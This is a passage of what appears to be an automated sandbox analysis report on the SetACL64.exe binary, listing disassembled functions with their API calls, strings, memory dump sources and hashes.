                                                  • Opcode ID: c4ae961d942addcf2b134008d439d8ef08f12080ebcb94819dad5dfadd3a20b1
                                                  • Instruction ID: 7d21e84ab38802357624a1afc25beee0000b3cf73c52503a83d56944a3ec8b2a
                                                  • Opcode Fuzzy Hash: c4ae961d942addcf2b134008d439d8ef08f12080ebcb94819dad5dfadd3a20b1
                                                  • Instruction Fuzzy Hash: 8851E332E0C22382F7257E2AD5043BAE5A0AB48734F998435DA4E476D7CEBDE850C761
                                                  Function 00007FF7C176AAE0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$_invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 2401491561-0
                                                  • Opcode ID: 1486c1b8983b2ca0bcc84f6bab691d8d42c10c3cc9c104c01906a72530798f0a
                                                  • Instruction ID: 28aa5466005889d6543f83b22887e9ad6df58ccd005a34f7668a279422931fc2
                                                  • Opcode Fuzzy Hash: 1486c1b8983b2ca0bcc84f6bab691d8d42c10c3cc9c104c01906a72530798f0a
                                                  • Instruction Fuzzy Hash: 14313365B15A4681FF04AF5BE854238A311AF8DBB4FD44531C94D0BBA6DFACE4D48330
                                                  Function 00007FF7C171EA60 Relevance: 6.0, APIs: 4, Instructions: 34synchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Event$MutexObjectReleaseResetSingleWait
                                                  • String ID:
                                                  • API String ID: 2375943032-0
                                                  • Opcode ID: 7b46ffe4c5099b2b667e965cb1ff3ada34845c803c41c1e8d10894002ef2c070
                                                  • Instruction ID: 28a54d9e8cf08c91a2d31f1d22cf4262ea7ad3317290fb848a3d6bf088e366d1
                                                  • Opcode Fuzzy Hash: 7b46ffe4c5099b2b667e965cb1ff3ada34845c803c41c1e8d10894002ef2c070
                                                  • Instruction Fuzzy Hash: 4B010C32614B4181DB04DF22E89433DB3A0FB88FA8F558131CA5D473A5DF78D895C350
                                                  Function 00007FF7C1701710 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 220COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: -log
                                                  • API String ID: 0-56760616
                                                  • Opcode ID: 1eecdd57994f2533d2a3b202c9ec56c7c722615268746318ca363c07f4b769d4
                                                  • Instruction ID: 5ec2f9435d4525066b806709dd454c3978f4cb22b73b77eda6e8266ea2d44eaa
                                                  • Opcode Fuzzy Hash: 1eecdd57994f2533d2a3b202c9ec56c7c722615268746318ca363c07f4b769d4
                                                  • Instruction Fuzzy Hash: 1591AD32B15B4189EB04EFA6D4402AC73B1EB49BB8F804136DE1E57BDADE78E545C350
                                                  Function 00007FF7C1746EA8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: __except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 1467352782-3733052814
                                                  • Opcode ID: 140bdb4f9088bb5670319dceb203d8db25e3c3c3cfd3d3b344dc43606597f418
                                                  • Instruction ID: d1e46890fca850b8e94c9f9f5ec8ac78006565f236b31f35af24adcd5b1292ec
                                                  • Opcode Fuzzy Hash: 140bdb4f9088bb5670319dceb203d8db25e3c3c3cfd3d3b344dc43606597f418
                                                  • Instruction Fuzzy Hash: 1171A332A0968186DB60AF26D49077DFBA1EB48FA4F948135EE8C47A86CB7CD451CF50
                                                  Function 00007FF7C17464E4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: EncodePointer
                                                  • String ID: MOC$RCC
                                                  • API String ID: 2118026453-2084237596
                                                  • Opcode ID: 2b0c2825179cba656fd1c1b471b4941425bc7ec70a51c4e696d4729a40678a82
                                                  • Instruction ID: e9f09080963b50715450cff7e6d005ed6faed860ad04c73ca17ca385ed5b6005
                                                  • Opcode Fuzzy Hash: 2b0c2825179cba656fd1c1b471b4941425bc7ec70a51c4e696d4729a40678a82
                                                  • Instruction Fuzzy Hash: 61515D36A08A45CAEB10DF66D0403ADB7A0F748B98F544536EF4D17B5ACFB8E055CB50
                                                  Function 00007FF7C173B313 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 129COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ?\UNC\$\\?
                                                  • API String ID: 0-2035776247
                                                  • Opcode ID: a4f302d2082b19bd39a44b1874956c81c3294110edb74e814a97884128a82e9b
                                                  • Instruction ID: a6d3f08f65f2a67da4da06dd93c7ec09e81fc999e6a16071a96c04513bcf6d09
                                                  • Opcode Fuzzy Hash: a4f302d2082b19bd39a44b1874956c81c3294110edb74e814a97884128a82e9b
                                                  • Instruction Fuzzy Hash: B241AA62F1866681FF00EF66D0543BDA361EB187B8FC04132EE5D17AC6DEAC91808364
                                                  Function 00007FF7C174747C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: CreateFrameInfo__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 2558813199-1018135373
                                                  • Opcode ID: bff377e20215f6bbc56ca34a453ae38d57878f3cd995b74642c36c42e48d33ca
                                                  • Instruction ID: 5222aa39ee3e7628234268a67a774a906819153e87d226d096a53d28da7b0175
                                                  • Opcode Fuzzy Hash: bff377e20215f6bbc56ca34a453ae38d57878f3cd995b74642c36c42e48d33ca
                                                  • Instruction Fuzzy Hash: 3E512676619645C6E760EF26A44026EB7A4FB88BA0F510134EB8D07B56CF7CE460CF51
                                                  Function 00007FF7C175294C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C175297E
                                                    • Part of subcall function 00007FF7C1755054: HeapFree.KERNEL32(?,?,00007FF7C17534C7,00007FF7C1754ADC,?,?,?,00007FF7C1754E5F,?,?,000083BA01AAD97A,00007FF7C1755874,?,?,?,00007FF7C17557A7), ref: 00007FF7C175506A
                                                    • Part of subcall function 00007FF7C1755054: GetLastError.KERNEL32(?,?,00007FF7C17534C7,00007FF7C1754ADC,?,?,?,00007FF7C1754E5F,?,?,000083BA01AAD97A,00007FF7C1755874,?,?,?,00007FF7C17557A7), ref: 00007FF7C175507C
                                                  • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7C174226D), ref: 00007FF7C175299C
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe, xrefs: 00007FF7C175298A
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe
                                                  • API String ID: 3580290477-3554785221
                                                  • Opcode ID: aa599a36ba6a0968a49bd794e7a1571458fa8a1e1b45d82a3122116992cc5e68
                                                  • Instruction ID: a1356fd6ae439a5a3df2b5f9625deb966a43ea792b96cad8ad5e2c382c99f218
                                                  • Opcode Fuzzy Hash: aa599a36ba6a0968a49bd794e7a1571458fa8a1e1b45d82a3122116992cc5e68
                                                  • Instruction Fuzzy Hash: B6416E32A08F52C5EB54FF2798501BCA6A5EB4C7A0F944035EE4E47B86DFBDE8458360
                                                  Function 00007FF7C175E6E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: U
                                                  • API String ID: 442123175-4171548499
                                                  • Opcode ID: d59aa33b38612ae6739f83d51169c656099beb2d3f667978864e56d4317c1a25
                                                  • Instruction ID: dfeb8015ee1ab7720ab240b9aca056197ed60d18646a561997388b452ce5ec5a
                                                  • Opcode Fuzzy Hash: d59aa33b38612ae6739f83d51169c656099beb2d3f667978864e56d4317c1a25
                                                  • Instruction Fuzzy Hash: 4441C532B1CA4182EB20EF26E4543A9E7A0FB987A4F944031EE4D87759DFBCE401C750
                                                  Function 00007FF7C175BED4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _handle_errorf
                                                  • String ID: "$powf
                                                  • API String ID: 2315412904-603753351
                                                  • Opcode ID: 4c8a7104b5368009bc02c85030aff32139670d494d3475396f94041b1bf7d79b
                                                  • Instruction ID: afce8507801c61c4889832d15bb86aee1fcbbf2ae83a8b61a0334076bf1394d8
                                                  • Opcode Fuzzy Hash: 4c8a7104b5368009bc02c85030aff32139670d494d3475396f94041b1bf7d79b
                                                  • Instruction Fuzzy Hash: 89414073D28A80DAD370DF22E4847AAB7A0F79A358F501326F74906999CBBDC5509B50
                                                  Function 00007FF7C173E1C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00007FF7C175DE6C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C175DE8E
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C173E2EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_invalid_parameter_noinfo_noreturn
                                                  • String ID: rt, ccs=UNICODE$wt, ccs=UNICODE
                                                  • API String ID: 1705651295-2937027470
                                                  • Opcode ID: 935450736d1db829583b36a6614573cb82d4dc60051ad41040f15e431cbeb578
                                                  • Instruction ID: 7d4dbd86f01139f71333ada71e64ded4db46116d2ed06907f826213f4ea06539
                                                  • Opcode Fuzzy Hash: 935450736d1db829583b36a6614573cb82d4dc60051ad41040f15e431cbeb578
                                                  • Instruction Fuzzy Hash: B131A132A0CA4285EB50EF1AE49422DB360FB8C7A4FD04235E79D43A96DFBCE550C710
                                                  Function 00007FF7C171AAB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: FormatFreeLocalMessage
                                                  • String ID: asio.system error
                                                  • API String ID: 1427518018-3828095645
                                                  • Opcode ID: 10628e73ec9175718b0e5b4b763344832475aea0b876288d78f2d80f17bd1f45
                                                  • Instruction ID: aba7e845cc51670b215a6866ac88bbeabb8147c2adcd4ddd3e10072bfc209aa7
                                                  • Opcode Fuzzy Hash: 10628e73ec9175718b0e5b4b763344832475aea0b876288d78f2d80f17bd1f45
                                                  • Instruction Fuzzy Hash: 77214C72608BD182FB249F16A540329BAA6F749BE0F944235DB9903B95CFBCD4A18B50
                                                  Function 00007FF7C175BDB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _handle_error
                                                  • String ID: "$pow
                                                  • API String ID: 1757819995-713443511
                                                  • Opcode ID: 1ec19b026a6bd8f63a67ca0b1a3ee6df7a61ad1018684fb431e5833eb4d51299
                                                  • Instruction ID: 3a8420ad437e6787615b917bab49964a1649eb53d7bfa173f2f292a7007da3f8
                                                  • Opcode Fuzzy Hash: 1ec19b026a6bd8f63a67ca0b1a3ee6df7a61ad1018684fb431e5833eb4d51299
                                                  • Instruction Fuzzy Hash: 54316B72D18E8486D770DF21E04467AEAA1FBDE354F641326F78906A55CBBDD0819B10
                                                  Function 00007FF7C173CE00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: CloseHandleLocalTime
                                                  • String ID: %04d-%02d-%02d %02d-%02d-%02d-%03d
                                                  • API String ID: 655981579-2017722003
                                                  • Opcode ID: daa5ccae675e1664e87c3d862e659ce2e173f1fd8162f8e579eca52e1a44dbca
                                                  • Instruction ID: 8ac8b3757bfe87c23dd5455c25451036eb6c2011ddf18be39493c3ac4749bffa
                                                  • Opcode Fuzzy Hash: daa5ccae675e1664e87c3d862e659ce2e173f1fd8162f8e579eca52e1a44dbca
                                                  • Instruction Fuzzy Hash: 0A31C532A14B8199E7109F71E8807DC7BB4FB4479CF605128EE8927B29DF7892A6D344
                                                  Function 00007FF7C175A688 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _set_errno_from_matherr
                                                  • String ID: exp
                                                  • API String ID: 1187470696-113136155
                                                  • Opcode ID: d9922d9e5b80ecf97583ad5356538061466fbce9c40230637d87b0462a7541d6
                                                  • Instruction ID: a90f040fb0185a879e8ddabd96edc5b1f97f2ee4d48f5979fe2450b2a3c2f141
                                                  • Opcode Fuzzy Hash: d9922d9e5b80ecf97583ad5356538061466fbce9c40230637d87b0462a7541d6
                                                  • Instruction Fuzzy Hash: 44211036A19A45CBDB60EF29A45016AB7B0FB8D310F905535F68D82B56DF7CD4408F20
                                                  Function 00007FF7C17580C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Stringtry_get_function
                                                  • String ID: LCMapStringEx
                                                  • API String ID: 2588686239-3893581201
                                                  • Opcode ID: 87cf0034b0fcd9c54c61c9bab6167fa2d33436d6331be54f9b1c0558e02e15ee
                                                  • Instruction ID: 8fb9d9cfe0efff0bde84a34bbf3419f0901001541dfe7c12f0fb6b9d8fcce211
                                                  • Opcode Fuzzy Hash: 87cf0034b0fcd9c54c61c9bab6167fa2d33436d6331be54f9b1c0558e02e15ee
                                                  • Instruction Fuzzy Hash: 05114F32608B8186D760DF56F4402AAB7A4F7CDB90F54413AEE8D43B1ACF3CD4508B50
                                                  Function 00007FF7C1744C18 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF7C1741032), ref: 00007FF7C1744C5C
                                                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF7C1741032), ref: 00007FF7C1744CA2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: 926c8d61ae619e4cea6d38c76edcc3f0fce93d5721c54efb26694986da39f2c5
                                                  • Instruction ID: 017d4dd02b8d8bea632ad6e024212759312f35952737121bb06c49b965d5cbba
